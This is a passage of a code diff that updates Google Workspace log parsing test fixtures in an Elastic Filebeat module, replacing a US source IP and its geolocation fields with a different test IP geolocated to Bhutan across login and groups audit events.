 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1192,7 +1112,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "group",
@@ -1209,27 +1129,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 9712,
+ "log.offset": 9692,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1255,7 +1171,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "group",
@@ -1272,27 +1188,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 10148,
+ "log.offset": 10127,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1318,7 +1230,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "group",
@@ -1335,27 +1247,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 10578,
+ "log.offset": 10556,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1381,7 +1289,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "group",
@@ -1398,27 +1306,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 11016,
+ "log.offset": 10993,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1444,7 +1348,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "deletion",
@@ -1461,27 +1365,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 11448,
+ "log.offset": 11424,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log
index b721c74bf484..cc181596f848 100644
--- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log
@@ -1,14 +1,14 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"gov_attack_warning"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"gov_attack_warning"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json
index 68ecbb4fc1f5..8df0b1ccf9f0 100644
--- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
 "event.provider": "login",
 "event.type": [
 "change",
@@ -24,23 +24,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -64,7 +60,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
 "event.provider": "login",
 "event.start": "2020-07-02T13:08:25.123Z",
 "event.type": [
@@ -77,26 +73,22 @@
 "google_workspace.login.affected_email_address": "foo@elastic.co",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 406,
+ "log.offset": 405,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -120,7 +112,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
